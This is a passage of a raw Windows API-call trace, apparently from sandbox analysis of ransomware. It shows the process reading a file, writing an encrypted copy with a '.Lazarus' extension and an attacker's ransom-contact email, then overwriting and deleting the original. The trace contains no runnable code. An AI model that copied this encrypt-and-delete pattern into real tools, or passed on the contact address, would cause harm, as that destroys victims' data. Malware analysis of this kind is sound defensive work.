lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.556] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0074.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0074.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.557] AreFileApisANSI () returned 1 [0074.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico", lpUsedDefaultChar=0x0) returned 43 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0074.558] AreFileApisANSI () returned 1 [0074.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 43 [0074.558] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.558] GetFileType (hFile=0x42c) returned 0x1 [0074.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.558] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0074.559] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0074.559] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0074.559] CloseHandle (hObject=0x42c) returned 1 [0074.559] AreFileApisANSI () returned 1 [0074.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 43 [0074.559] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.559] GetFileType (hFile=0x42c) returned 0x1 [0074.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.559] CloseHandle (hObject=0x42c) returned 1 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.561] AreFileApisANSI () returned 1 [0074.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 43 [0074.561] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0074.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.561] AreFileApisANSI () returned 1 [0074.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0074.561] GetLastError () returned 0x0 [0074.561] SetLastError (dwErrCode=0x0) [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dee0 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b450 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0074.561] GetLastError () returned 0x0 [0074.561] SetLastError (dwErrCode=0x0) [0074.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0074.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0074.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0074.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0074.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0074.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0074.562] AreFileApisANSI () returned 1 [0074.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0074.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x5a6b8 [0074.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=105 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 105 [0074.562] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.562] GetFileType (hFile=0x42c) returned 0x1 [0074.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0074.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.563] AreFileApisANSI () returned 1 [0074.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67a20 [0074.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 43 [0074.563] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.563] GetFileType (hFile=0x410) returned 0x1 [0074.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0074.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0074.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.563] GetLastError () returned 0x0 [0074.563] SetLastError (dwErrCode=0x0) [0074.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.563] GetLastError () returned 0x0 [0074.563] SetLastError (dwErrCode=0x0) [0074.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.563] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x37e, lpOverlapped=0x0) returned 1 [0074.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0074.566] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0074.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0074.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0074.566] GetLastError () returned 0x0 [0074.566] SetLastError (dwErrCode=0x0) [0074.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d510 [0074.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0074.566] GetLastError () returned 0x0 [0074.566] SetLastError (dwErrCode=0x0) [0074.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0074.566] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0x380, lpOverlapped=0x0) returned 1 [0074.567] GetLastError () returned 0x0 [0074.567] SetLastError (dwErrCode=0x0) [0074.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0074.567] GetLastError () returned 0x0 [0074.567] SetLastError (dwErrCode=0x0) [0074.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0074.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0074.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0074.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0074.567] CloseHandle (hObject=0x42c) returned 1 [0074.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.568] CloseHandle (hObject=0x410) returned 1 [0074.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0074.569] AreFileApisANSI () returned 1 [0074.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67a20 [0074.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 43 [0074.569] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.570] GetFileType (hFile=0x410) returned 0x1 [0074.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0074.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.570] GetLastError () returned 0xb7 [0074.570] SetLastError (dwErrCode=0xb7) [0074.570] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0074.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.571] CloseHandle (hObject=0x410) returned 1 [0074.571] AreFileApisANSI () returned 1 [0074.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67660 [0074.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 43 [0074.571] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico")) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b450 | out: hHeap=0x20000) returned 1 [0074.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0074.572] 